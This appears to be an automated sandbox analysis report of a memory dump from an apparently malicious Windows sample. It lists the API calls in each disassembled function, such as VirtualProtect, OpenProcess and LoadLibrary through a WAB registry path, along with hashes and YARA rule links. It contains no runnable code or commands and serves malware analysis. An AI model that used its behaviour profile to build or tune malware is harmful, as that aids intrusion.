Part of subcall function 0462CC6B: CreateFileMappingW.KERNEL32(000000FF,04648168,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0462CCCE
Part of subcall function 0462CC6B: GetLastError.KERNEL32 ref: 0462CCE0
Part of subcall function 0462CC6B: CloseHandle.KERNEL32(00000000), ref: 0462CD18

UnmapViewOfFile.KERNEL32(?), ref: 046336FE
CloseHandle.KERNEL32(?), ref: 04633707
SetEvent.KERNEL32(05D3BC3E), ref: 0463374E
GetLastError.KERNEL32(Function_00009271,00000000,00000000), ref: 0463377D
CloseHandle.KERNEL32(00000000,Function_00009271,00000000,00000000), ref: 0463378D

Part of subcall function 0463737F: lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,046269C1,00000000,00000000,04639952,00000000,00000000,7711DBB0,00000020,00000000), ref: 0463738B
Part of subcall function 0463737F: memcpy.NTDLL(00000000,00000000,00000000,00000106,?,?,046269C1,00000000,00000000,04639952,00000000,00000000,7711DBB0,00000020,00000000), ref: 046373B3
Part of subcall function 0463737F: memset.NTDLL ref: 046373C5

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: ee19f171827af2da5c8d2b7a8b904a439aa5093e18c37ba8a3d956fc84c962b1
Instruction ID: d3ca31195e7943db7d6508abf12cd8784facb18b67faf43516d6abbea2ece269
Opcode Fuzzy Hash: ee19f171827af2da5c8d2b7a8b904a439aa5093e18c37ba8a3d956fc84c962b1
Instruction Fuzzy Hash: CF21C6B9600645BBEF11AFB4DC45B5A37E8EF91B16B001429E941D3350FB35FC418B68

Uniqueness

Uniqueness Score: -1.00%

Function 04621557, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04640E6C,00000000,?,?), ref: 04621575
GetFileSize.KERNEL32(00000000,00000000,?,?,04640E6C,00000000,?,?,?,00000000,-00000007,04631DE6,-00000007,?,00000000), ref: 04621585
ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,04640E6C,00000000,?,?,?,00000000,-00000007,04631DE6), ref: 046215B1
GetLastError.KERNEL32(?,?,04640E6C,00000000,?,?,?,00000000,-00000007,04631DE6,-00000007,?,00000000), ref: 046215D6
CloseHandle.KERNEL32(000000FF,?,?,04640E6C,00000000,?,?,?,00000000,-00000007,04631DE6,-00000007,?,00000000), ref: 046215E7

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: e53318ba4d02b9c0f4a7e38368f0e67c494a0897ad184e8f9ea66065aa36e28e
Instruction ID: e8e16318f7d3677b1386e2c341237b6cc0c2866632a3b499014cb66ed90090c2
Opcode Fuzzy Hash: e53318ba4d02b9c0f4a7e38368f0e67c494a0897ad184e8f9ea66065aa36e28e
Instruction Fuzzy Hash: CC110DB2604526BFDB305F65CC88AEE7B9CEB56760F014565F916B7240FA30AD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 04639A4C, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 04639A5D
StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 04639A76
StrTrimA.SHLWAPI(?,20000920), ref: 04639A9E
StrTrimA.SHLWAPI(00000000,20000920), ref: 04639AAD
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 04639AE4

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: fe038c407dcccb4921241c991b6e6569830c669496fc55b7e04abdcf459ee547
Instruction ID: dccb62219237257a0336a715b5cf049265137bec91ae2bf591ad3157834b9c31
Opcode Fuzzy Hash: fe038c407dcccb4921241c991b6e6569830c669496fc55b7e04abdcf459ee547
Instruction Fuzzy Hash: D71189B6200245BFEB219B59DC84F977B9CDB95791F101121F90597340FBB4ED058F50

Uniqueness

Uniqueness Score: -1.00%

Function 04636517, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,016EF5A8,?,?,?,?,?,0463DD01,73B75520,?,04623F76,?,?), ref: 0463654E
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0463DD01,73B75520,?,04623F76,?,?), ref: 0463657E
RtlEnterCriticalSection.NTDLL(04648380), ref: 0463658D
RtlLeaveCriticalSection.NTDLL(04648380), ref: 046365AB
GetLastError.KERNEL32(?,0463DD01,73B75520,?,04623F76,?,?), ref: 046365BB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 7d9e4950ca5b1ce363303e7c1ff243adfd6bd13d2ca123b948a372bfec567331
Instruction ID: fb2d40e2ccfe68ecfcac317c337351fcc93a7682df1d0a99d7f6599ba0d8fcc0
Opcode Fuzzy Hash: 7d9e4950ca5b1ce363303e7c1ff243adfd6bd13d2ca123b948a372bfec567331
Instruction Fuzzy Hash: D42107B9600B01EFDB21DFA8C985A5ABBF8FB08714B008629EA56D3710E774FD54CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04624CB8, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000), ref: 04624CE6
GetLastError.KERNEL32 ref: 04624D09
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04624D1C
GetLastError.KERNEL32 ref: 04624D27
HeapFree.KERNEL32(00000000,00000000), ref: 04624D6F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 4170a30df4fa52310d4f3f0f7670e0f16e69862f589f706986f7b29eff60f78e
Instruction ID: 64cecb42750fd8fc503ec590d6c9c81bff554c70827aed337197504fa4ff9148
Opcode Fuzzy Hash: 4170a30df4fa52310d4f3f0f7670e0f16e69862f589f706986f7b29eff60f78e
Instruction Fuzzy Hash: 6721F378200A04FBEB308F54DE89B5A7BB9EB91B15F600919E112961A0FF78BD84CF10

Uniqueness

Uniqueness Score: -1.00%

Function 04638D31, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(046360B8,?,?,?,?,00000008,046360B8,00000000,?), ref: 04638D4E
memcpy.NTDLL(046360B8,?,00000009,?,?,?,?,00000008,046360B8,00000000,?), ref: 04638D70
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 04638D88
lstrlenW.KERNEL32(00000000,00000001,046360B8,?,?,?,?,?,?,?,00000008,046360B8,00000000,?), ref: 04638DA8
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,046360B8,00000000,?), ref: 04638DCD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: 99166a1bcacb074705d5e5f0654bfc7be868b95bcbce17e3dc7c71dc9f0c9c48
Instruction ID: cdeeb0007e9d2edc9262f3dc26290d84d68f955507c8da55d834ca1b2200e68a
Opcode Fuzzy Hash: 99166a1bcacb074705d5e5f0654bfc7be868b95bcbce17e3dc7c71dc9f0c9c48
Instruction Fuzzy Hash: A5116679D00248BBDF11ABA4DC49FDE7BB8DF58751F004055F615E7281F678A604CB64

Uniqueness

Uniqueness Score: -1.00%

Function 046306F1, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,6E69614D), ref: 04630720
RtlEnterCriticalSection.NTDLL(046483A8), ref: 0463072D
RtlLeaveCriticalSection.NTDLL(046483A8), ref: 04630740
lstrcmpi.KERNEL32(046483C0,00000000), ref: 04630760
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0463A74F,00000000), ref: 04630774

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID:
API String ID: 1266740956-0
Opcode ID: 798d589c80e9071054baa801744561f427f47fc572b04b68d480fcba0e9983ed
Instruction ID: 3260727e992562849b0ac5ae061ed8f8eec221f9a1eddd4ac836b07041db8760
Opcode Fuzzy Hash: 798d589c80e9071054baa801744561f427f47fc572b04b68d480fcba0e9983ed
Instruction Fuzzy Hash: 31117C79900215EFEF05EFA8D859A99B7B8FB84325F14902AE40993340F778ED158FA0

Uniqueness

Uniqueness Score: -1.00%

Function 04627713, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,0462FBDF,00000000,00000000,00000000,73B75520,00000000,?,0462ECDD,00000020,00000000,?,00000000), ref: 0462771D

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

lstrcpy.KERNEL32(00000000,00000000), ref: 04627741
StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0462ECDD,00000020,00000000,?,00000000,?,00000000,00000000), ref: 04627748
lstrcpy.KERNEL32(00000000,4C003436), ref: 04627790
lstrcat.KERNEL32(00000000,?), ref: 0462779F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: 8f3bbf890d3abc05ad653a059a1d39ec43db42164121da515e7caf85b08372bf
Instruction ID: 7aaa2420e9e61181310958ddfc96243974aa546fe5cd05951c97890e4110742c
Opcode Fuzzy Hash: 8f3bbf890d3abc05ad653a059a1d39ec43db42164121da515e7caf85b08372bf
Instruction Fuzzy Hash: 5B11A07A100616AFEB209B75ED88E6B77ECEBD5742F054429F505C3200FB34E8498B21

Uniqueness

Uniqueness Score: -1.00%

Function 04638E62, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04626356: lstrlen.KERNEL32(00000000,00000000,?,00000000,04640479,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000), ref: 04626362

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04638E8B
memcpy.NTDLL(00000000,?,?), ref: 04638E9E
RtlEnterCriticalSection.NTDLL(046483A8), ref: 04638EAF
RtlLeaveCriticalSection.NTDLL(046483A8), ref: 04638EC4
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04638EFC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: fea46f5be1feba8973cd4ca646cb82cc46126f36e00cd0314a72225cad1c0163
Instruction ID: 51d629c3dbe0dbc21d246eee7ba07a0b174c4f4f0c61e5445ed42176b676912a
Opcode Fuzzy Hash: fea46f5be1feba8973cd4ca646cb82cc46126f36e00cd0314a72225cad1c0163
Instruction Fuzzy Hash: 2611E17A105260AFDF117F64EC44D6B7BA8EBC5766701213EF90293240FB39AC15CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 04640385, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(046241EA,00000000,00000000,00000000,?,0463C684,22207C20,046241EA,00000000), ref: 0464039B
lstrlen.KERNEL32(22207C20,?,0463C684,22207C20,046241EA,00000000), ref: 046403A2
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 046403B0

Part of subcall function 04621673: GetLocalTime.KERNEL32(?,?,04632C15,00000000,00000001), ref: 0462167D
Part of subcall function 04621673: wsprintfA.USER32 ref: 046216B0

wsprintfA.USER32 ref: 046403D2

Part of subcall function 04637A56: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,046403FA,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04637A74
Part of subcall function 04637A56: wsprintfA.USER32 ref: 04637A99

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04640403

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID:
API String ID: 3847261958-0
Opcode ID: 5aacc1d44e62cbf8a56d77a0ad4c0958f85b524cc8ba07078017c1e17517e1a3
Instruction ID: bb84c78820d88bbec67b97f4905a137fca9cf964cf668274efd33928ad268acc
Opcode Fuzzy Hash: 5aacc1d44e62cbf8a56d77a0ad4c0958f85b524cc8ba07078017c1e17517e1a3
Instruction Fuzzy Hash: 6301A13A100218FBDF111F26EC04EAA7F69EBD57A1B048022FD0996211F6369D61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0463DC08, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0462815A,?,?,00000000,0463A5C8,?,00000000), ref: 0463DC47
ResetEvent.KERNEL32(?,?,0462815A,?,?,00000000,0463A5C8,?,00000000), ref: 0463DC4C
GetLastError.KERNEL32(0462815A,?,?,00000000,0463A5C8,?,00000000), ref: 0463DC67
GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0462815A,?,?,00000000,0463A5C8,?,00000000), ref: 0463DC96

Part of subcall function 0462DCCE: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?,?,00000000), ref: 0462DCDA
Part of subcall function 0462DCCE: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?), ref: 0462DD38
Part of subcall function 0462DCCE: lstrcpy.KERNEL32(00000000,00000000), ref: 0462DD48

SetEvent.KERNEL32(?,0462815A,?,?,00000000,0463A5C8,?,00000000), ref: 0463DC88

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: e50d4f0c4c223365ebd61e8687e181807f64112d5ea4b3c1f51b52cd60ae512d
Instruction ID: 14f8fcea2366f563525a892abb74f7d74e0b86769d404521964b2463b62dca53
Opcode Fuzzy Hash: e50d4f0c4c223365ebd61e8687e181807f64112d5ea4b3c1f51b52cd60ae512d
Instruction Fuzzy Hash: 7B11A071110688ABDF309F60DC44E9B3BADEF44765F004A24F915811A1FB75E861DB60

Uniqueness

Uniqueness Score: -1.00%

Function 046380C7, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 046380DE

Part of subcall function 046307AA: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 046307C1
Part of subcall function 046307AA: SetEvent.KERNEL32(?,?,?,?,0463A5C8,?,?), ref: 046307D1

lstrlen.KERNEL32(?,?,?,?,?,04623C41,?,?), ref: 04638101
lstrlen.KERNEL32(?,?,?,?,04623C41,?,?), ref: 0463810B
memcpy.NTDLL(?,?,00004000,?,?,04623C41,?,?), ref: 0463811C
HeapFree.KERNEL32(00000000,?,?,?,?,04623C41,?,?), ref: 0463813E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
String ID:
API String ID: 442095154-0
Opcode ID: 114ad11758d75934be143a9538d650f27d2c6a6fd3764a06455b0f695f89e4ad
Instruction ID: 76f123ce8059a53b54ed4efd38521ae6c420556431c1cb284df5f130cf1df17d
Opcode Fuzzy Hash: 114ad11758d75934be143a9538d650f27d2c6a6fd3764a06455b0f695f89e4ad
Instruction Fuzzy Hash: 5411A979600241EBCB11AF54EC45E9ABBF8EBD5366F204028F801A3210FB35AE109B24

Uniqueness

Uniqueness Score: -1.00%

Function 04639117, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0463DEFE: lstrlen.KERNEL32(00000000,?,00000020,?,00000000,04639946,00000000,7711DBB0,00000020,00000000), ref: 0463DF0D
Part of subcall function 0463DEFE: mbstowcs.NTDLL ref: 0463DF29

lstrlenW.KERNEL32(00000000,00000000,00000094,50504125,00000000,?,?,0462E03C,?), ref: 04639143
RtlAllocateHeap.NTDLL(00000000,?), ref: 04639155
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0462E03C,?), ref: 04639172
lstrlenW.KERNEL32(00000000,?,?,0462E03C,?), ref: 0463917E
HeapFree.KERNEL32(00000000,00000000,?,?,0462E03C,?), ref: 04639192

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID:
API String ID: 3403466626-0
Opcode ID: bdb3f1a280b2c6391a7a62f91f07b20b7d362ab85a9974f3495ed25c0244665e
Instruction ID: c67034e5319f6ae4fdc59c8a064bf6df3ac9f782e3b9c876e704a70bf86cc47d
Opcode Fuzzy Hash: bdb3f1a280b2c6391a7a62f91f07b20b7d362ab85a9974f3495ed25c0244665e
Instruction Fuzzy Hash: A9019E7A100204BFDB119F98EC49F9A77ECEF99716F001015F60197251EBB8AD148BA4

Uniqueness

Uniqueness Score: -1.00%

Function 046409CA, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 046409EA
GetModuleHandleA.KERNEL32 ref: 046409F8
LoadLibraryExW.KERNEL32(?,?,?), ref: 04640A05
GetModuleHandleA.KERNEL32 ref: 04640A1C
GetModuleHandleA.KERNEL32 ref: 04640A28

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 084ad017c391a9d6f0a97a1447b735a9ab45afdad75163c45825f6ade2d64c79
Instruction ID: b78662761be956ea6d9d6f0a0e10e17ddb871b989cf4e9c2a89ac93f59b30916
Opcode Fuzzy Hash: 084ad017c391a9d6f0a97a1447b735a9ab45afdad75163c45825f6ade2d64c79
Instruction Fuzzy Hash: D8018635610326AFEF016F69ED41A5A7F99EFA83613041136FA14C2261FF75DC21DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462446D, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(04648380), ref: 04624478
RtlLeaveCriticalSection.NTDLL(04648380), ref: 04624489
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 046244A0
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 046244BA
GetLastError.KERNEL32 ref: 046244C7

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: e4a543e1d69aa2175153c0430378f316143647d6911359983b579ec1e88044dc
Instruction ID: 0e164ee9af3f1d70f22becef46feb150fbf02894a543ff64d42bca2994680553
Opcode Fuzzy Hash: e4a543e1d69aa2175153c0430378f316143647d6911359983b579ec1e88044dc
Instruction Fuzzy Hash: 91018F79200B04AFDB219F54C805E6ABBB9EFC4724B114519EA5693690EB70FD05CF24

Uniqueness

Uniqueness Score: -1.00%

Function 0462EDB4, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04639208,?), ref: 0462EDBC
GetVersion.KERNEL32 ref: 0462EDCB
GetCurrentProcessId.KERNEL32 ref: 0462EDE7
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0462EE04
GetLastError.KERNEL32 ref: 0462EE23

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 97a120110c3a83a7dc39b6f0e55068f792cfebd71ea975d290bde754d255b5e5
Instruction ID: 0c89a306f46178606e7167ad3aa4328be5ec34fc0f57666ff94078c978c80e69
Opcode Fuzzy Hash: 97a120110c3a83a7dc39b6f0e55068f792cfebd71ea975d290bde754d255b5e5
Instruction Fuzzy Hash: 0DF0A47C640B13ABDF606F20D90A7253F51E7A8751F101926E592CB2C0FB79A851CF14

Uniqueness

Uniqueness Score: -1.00%

Function 046375F0, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 046375FD
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 0463760D
CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 04637616
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,04632047,?,?,00000040), ref: 04637634
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,04632047,?,?,00000040), ref: 04637641

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
String ID:
API String ID: 3667519916-0
Opcode ID: 03fbc71bc345dc3ae853ffe50a10a26b6cdc9c224ae3313cd7603e07ba0d3631
Instruction ID: 1dbd8a61170aeba6162e92780192e698f73e42c9714173e60cc380d9d43427fc
Opcode Fuzzy Hash: 03fbc71bc345dc3ae853ffe50a10a26b6cdc9c224ae3313cd7603e07ba0d3631
Instruction Fuzzy Hash: 1BF09071200B00AFEB306B69DC48B1A72A8EF95752F104628F041925D0FF24FC41CA28

Uniqueness

Uniqueness Score: -1.00%

Function 04626CDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 04626D11
RtlFreeAnsiString.NTDLL(?), ref: 04626D88
WaitForSingleObject.KERNEL32(00000000), ref: 04626D95

Strings

?@, xrefs: 04626D70

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: 75aad99564ce6a75a0efcb73431a9a9f79dc372153b29ea87d4c6e3f5628a68d
Instruction ID: 1796e8194d62569ab6069ab2964de89f4e90a698bbdd72a2da473c77b620bc3a
Opcode Fuzzy Hash: 75aad99564ce6a75a0efcb73431a9a9f79dc372153b29ea87d4c6e3f5628a68d
Instruction Fuzzy Hash: F421D471104A68BBCB10AF64DA8986AB3A9FB90310B544E2FF040C6220F734FC518F92

Uniqueness

Uniqueness Score: -1.00%

Function 04633DF9, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,73B75520,00000000,?,?,?,?,?), ref: 04633E1D

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

wsprintfA.USER32 ref: 04633E4E

Part of subcall function 04626DB3: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0463D339), ref: 04626DC9
Part of subcall function 04626DB3: wsprintfA.USER32 ref: 04626DF1
Part of subcall function 04626DB3: lstrlen.KERNEL32(?), ref: 04626E00
Part of subcall function 04626DB3: wsprintfA.USER32 ref: 04626E40
Part of subcall function 04626DB3: wsprintfA.USER32 ref: 04626E75
Part of subcall function 04626DB3: memcpy.NTDLL(00000000,?,?), ref: 04626E82
Part of subcall function 04626DB3: memcpy.NTDLL(00000008,046443E8,00000002,00000000,?,?), ref: 04626E97
Part of subcall function 04626DB3: wsprintfA.USER32 ref: 04626EBA

HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04633EC3

Part of subcall function 04641A6E: RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 04641A84
Part of subcall function 04641A6E: RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 04641A9F

HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 04633EAD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 04633EB9

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID:
API String ID: 3553201432-0
Opcode ID: 1cfbe9746a88145c42d45d8c8a553761a7eceeb012f1e01888a1b4c69a3c579a
Instruction ID: 6b46a5a42584408d4540f1f6c49667449ca96cd14515edcf5305ac582b016a99
Opcode Fuzzy Hash: 1cfbe9746a88145c42d45d8c8a553761a7eceeb012f1e01888a1b4c69a3c579a
Instruction Fuzzy Hash: DB21F6BA900249AFCF11EFA5DD48CDF7FB9FB89310B00441AF905A7211E7759A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463CCED, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 04629422: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0462943D
Part of subcall function 04629422: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0462948B
Part of subcall function 04629422: GetProcAddress.KERNEL32(00000000,4F424157), ref: 046294A4
Part of subcall function 04629422: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 046294F5

GetLastError.KERNEL32(?,?,00000001), ref: 0463CE7B
FreeLibrary.KERNEL32(?,?,00000001), ref: 0463CEE3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 074d494fe519e426a3201904bbe39209c4dc939e1677377c570e177cdc09be7d
Instruction ID: d5fe68fbd67b064f7dd91604717a3feae924a96de0de253b3758c67df8820449
Opcode Fuzzy Hash: 074d494fe519e426a3201904bbe39209c4dc939e1677377c570e177cdc09be7d
Instruction Fuzzy Hash: DD71E4B6E00249EFCF10DFE4C8849AEBBB9FF49305B108469E516BB251E735A941DF60

Uniqueness

Uniqueness Score: -1.00%

Function 04641E85, Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0463DC39,00000000,0000EA60,00000000,00000000,00000000,?,0462815A,?,?), ref: 04641E91

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

ResetEvent.KERNEL32(?,?,?,?,0463DC39,00000000,0000EA60,00000000,00000000,00000000,?,0462815A,?,?,00000000,0463A5C8), ref: 04641F08
GetLastError.KERNEL32(?,?,?,0463DC39,00000000,0000EA60,00000000,00000000,00000000,?,0462815A,?,?,00000000,0463A5C8,?), ref: 04641F35

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

GetLastError.KERNEL32(?,?,?,0463DC39,00000000,0000EA60,00000000,00000000,00000000,?,0462815A,?,?,00000000,0463A5C8,?), ref: 04641FF7

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: ccf796fbbce621ca03a69e74b5353a09a870e0cc77effdb2633b0fd2f48be8bc
Instruction ID: d13a9cb910b19bd9d889d7fb3e5da21989c4b27d34ac012206765d7981295501
Opcode Fuzzy Hash: ccf796fbbce621ca03a69e74b5353a09a870e0cc77effdb2633b0fd2f48be8bc
Instruction Fuzzy Hash: 86418175500605AFDF209FA0CC88EBB7BEDEB95705F004929F512D1150FB70ED85DA20

Uniqueness

Uniqueness Score: -1.00%

